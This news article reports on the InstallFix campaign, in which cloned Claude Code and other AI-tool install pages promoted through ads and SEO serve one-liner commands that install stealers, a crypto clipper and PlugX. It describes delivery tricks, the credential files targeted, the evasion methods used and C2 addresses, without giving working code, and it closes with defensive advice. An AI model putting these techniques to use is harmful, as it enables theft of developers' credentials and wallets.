Developers hunting for the latest Anthropic tool now face a calculated risk. Search Google for “Claude Code install” or “Claude Code CLI.” The top result might not lead to code. It leads to compromise.
Since March 2026, attackers have flooded results with cloned pages. They mimic Anthropic’s documentation pixel for pixel. The layout matches. The fonts match. Even the sidebar navigation fools the eye. But one command differs. Users copy it. They paste it into a terminal. And the trap closes.
Push Security first exposed the pattern in early March. The firm named it InstallFix. A twist on the older ClickFix tactic. No fake error message. No CAPTCHA. Just swapped instructions on a page that looks official. Push Security noted the danger. “Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one.”
But the campaign runs far broader. Straiker researchers tracked 88 domains. Thirty-two still active in mid-May. They impersonate more than Claude. NotebookLM appears. So do JetBrains IDEs, Cline, Snowflake, Perplexity Comet and AtlasGPT. Ten or more hosting platforms host the fakes. Squarespace. GitHub Pages. Cloudflare Workers. Netlify. Even Tencent EdgeOne. Straiker.ai mapped the sprawl in late May.
GitHub Pages played a special role. Ten domains created between May 11 and 14 carried fake developer portfolios. Names like Ellis Park or Taylor Reed. Repositories themed around Claude. Empty titles. Paths such as /app or /macos. JavaScript redirects waited. Cloaked. They fired only for certain user agents. GitHub’s reputation became the launchpad.
The lure works because trust runs deep. Developers adopt AI coding assistants fast. They paste commands without hesitation. That habit now costs them. “The attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt,” Straiker researchers wrote. “You copy a command. You paste it in your terminal. By then, it’s already too late.”
One technique stands out. The ampersand trick. A command appears clean. It ends with & followed by a hidden payload. The legitimate install runs. Malware launches in parallel. Background noise hides the damage. Base64 encoding obscures URLs. MSHTA.exe pulls HTA files. Rundll32 loads DLLs over WebDAV. Multi-stage chains follow.
Payloads vary. ACRStealer dominates many chains. This information stealer targets 65 browsers. It grabs AI credentials first. Files from ~/.cline/data/secrets.json. ~/.continue/config.yaml. Snowflake SSH keys. Perplexity Comet profiles. One hundred seventy-five crypto wallets. Password managers. Messaging apps. Files containing seed, mnemonic, wallet, api or pem. It uses ChaCha20-Poly1305 encryption. Command and control travels through Telegram dead drops and Binance Smart Chain smart contracts.
A crypto clipper travels alongside. Rust-compiled. It watches the clipboard. Replaces wallet addresses across 20 blockchains. One primary BSC contract handles C2: 0x7CC3cFC1Ac007B8c6566fD2C7419b15a75473468. A fallback Ethereum address sits at 0xA1E50DaF64fb2B342A64d848E396700962acC2d0. The infrastructure resists takedown. “The infrastructure can’t be taken down,” Straiker observed. “The campaign’s crypto-clipper routes its command-and-control through a Binance Smart Chain smart contract. No domain to seize, no server to shut off.”
Other variants deliver different wares. Malwarebytes uncovered a site mimicking Claude’s official download page. It pushed Claude-Pro-windows-x64.zip. The archive contained a trojanized MSI. It installed a working Claude app to a path with a deliberate misspelling: C:Program Files (x86)AnthropicClaudeCluade. A VBScript dropper ran the legitimate binary in the foreground. In the background it dropped NOVUpdate.exe, a signed G DATA binary, along with a malicious avk.dll and encrypted .dat file. The triad loaded into Startup. Classic DLL sideloading. The result? PlugX. A remote access trojan active in espionage since 2008. Malwarebytes detailed the sideloading in April. Stefan Dasic, the researcher, noted the operators “combined a proven sideloading technique with a timely social engineering lure—exploiting the surging popularity of AI tools.”
Trend Micro examined the InstallFix operation in May. The campaign hits multiple industries worldwide. Fake pages clone Anthropic’s installation instructions. Google Ads push them to the top. All links on the page point to the real Anthropic site. Only the one-liner command differs. It pulls from attacker domains. The firm called out the global reach and the speed with which new clones appear after takedowns. Trend Micro.
Bitdefender spotted similar Google Ads abuse in March. Attackers bought ads for “download claude code” and variants. The landing page copied Claude Code documentation exactly. Squarespace subdomains hosted many. One ad traced to a compromised Malaysian advertiser account. Bitdefender.
Huntress saw the impact firsthand. An engineer searched for Claude Code. Clicked the sponsored result. Within seconds base64 and gzip obfuscation unraveled. A script targeted the macOS keychain. It pulled Claude-related credentials. Obfuscated AppleScript hid the behavior. The firm’s tooling caught it. But many environments lack that visibility. Huntress.
Anthropic itself faced a related blow. On March 31 the company accidentally published a massive source map file to npm. Nearly 60 megabytes. Over 500,000 lines of unobfuscated TypeScript. The leak spread fast. Attackers spun up fake GitHub repos offering “unlocked” versions. Some dropped Vidar stealer and GhostSocks proxy. The timing amplified the fake install wave. Help Net Security covered the exploitation.
Recent weeks show no slowdown. As of late May, Straiker reported 15 new domains in a single cluster. SEO poisoning creates feedback loops. A fake page redirects to Google searches for install instructions. That boosts its own ranking. Paid ads carry UTM parameters that reveal campaign IDs. German language versions target specific locales with fake privacy policies.
Evasion layers stack high. Anti-debug checks. Sandbox detection. Direct syscalls. DLL unhooking. PPID spoofing. Post-quantum ML-KEM-768 encryption in one loader. Shellcode hidden in UUID strings. The ACRStealer binary talks over raw sockets and AFD. It bypasses AMSI with taunts in one variant.
Enterprise security teams now confront a new reality. Developers operate outside traditional perimeters. They install tools from terminals. They manage API keys that grant access to production systems, cloud resources and proprietary models. A single stolen key from Cline or Continue.dev can open doors wide.
Yet detection lags. Many EDR solutions miss the initial paste. The legitimate app runs. Users see expected behavior. Only later do anomalies surface. Credential exfiltration. Unusual clipboard activity. Connections to unfamiliar Telegram or blockchain endpoints.
Some defenders block entire categories. No GitHub Pages from unknown accounts. Strict allow lists for Squarespace subdomains. Browser policies that warn on lookalike domains. Application control that prevents unsigned MSHTA or PowerShell one-liners. But adoption remains patchy.
The campaign proves something larger. AI tools moved from experiment to daily driver faster than security models adapted. Trust in documentation pages, in one-liner installs, in branded shortcuts became the attack surface. Operators noticed. They built campaigns around that trust.
Straiker warned directly. “If your team uses Claude Code, Cline, Continue.dev, or any AI coding assistant, your credentials are a target.” The message carries weight. Because the pages keep appearing. The ads keep running. And the paste command remains the weakest link.
Verification takes seconds. Check the domain. Visit the official Anthropic site directly. Avoid sponsored results for new tools. But habits die hard. And in the race between speed and scrutiny, speed usually wins. Until the bill arrives in the form of drained wallets, leaked keys and remote access trojans.
How Fake Claude Code Pages Became the New Front Line in Developer Malware Attacks first appeared on Web and IT News.
